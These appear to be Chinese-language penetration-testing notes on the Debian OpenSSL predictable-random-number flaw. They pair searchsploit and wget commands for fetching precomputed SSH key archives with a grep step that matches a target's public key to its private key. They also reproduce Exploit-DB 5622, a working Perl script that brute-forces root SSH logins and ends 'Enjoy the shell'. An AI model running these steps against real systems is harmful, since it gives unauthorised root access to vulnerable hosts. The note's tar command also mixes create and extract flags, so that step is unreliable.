tar
tar -vcxjf 5622.tar.bz2
- -v –verbose 显示详细的tar处理的文件信息;
- -c –create创建新的文档;
- -x –extract, –get 解压文件;
- -j –bzip2 通过 bzip2 来归档压缩文件;
- -f –file 要操作的文件名。
PNRG(Pseudo-Random Number Generator)是一种伪随机数生成器,用于在计算机科学和密码学中生成近似随机的数字序列
OpenSSL 0.9.8c-1 < 0.9.8g-9
OpenSSL 0.9.8c-1 版本到 0.9.8g-9 版本之前的 Debian 系统存在一个漏洞。这个漏洞涉及到随机数生成器生成可预测的数字,从而使远程攻击者更容易对加密密钥进行暴力猜测攻击。
searchsploit prng
searchsploit -m linux/remote/5622.txt
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
tar -vcxjf 5622.tar.bz2
sudo grep -lr “此处写入公钥的部分内容”
找到公钥去掉后缀 就是私钥名 将私钥复制出来 就得到了 公钥的对应私钥
------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------- --------------------------------- GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (1) | multiple/remote/32673.java GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2) | multiple/remote/32674.cpp LPRng (RedHat 7.0) - 'lpd' Format String | linux/remote/227.c LPRng - use_syslog Remote Format String (Metasploit) | linux/remote/16842.rb LPRng 3.6.22/23/24 - Remote Command Execution | linux/remote/226.c LPRng 3.6.24-1 - Remote Command Execution | linux/remote/230.c LPRng 3.6.x - Failure To Drop Supplementary Groups | unix/local/20923.c LPRNG html2ps 1.0 - Remote Command Execution | unix/remote/21974.pl OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5622.txt OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby) | linux/remote/5632.rb ------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
***E-DB Note: Mirror ~ https://github.com/g0tmi1k/debian-ssh***
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
(debian_ssh_rsa_2048_x86.tar.bz2)
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}5. Enjoy the shell after some minutes (less than 20 minutes)Regards,
Markus Mueller
mm@deadbeef.de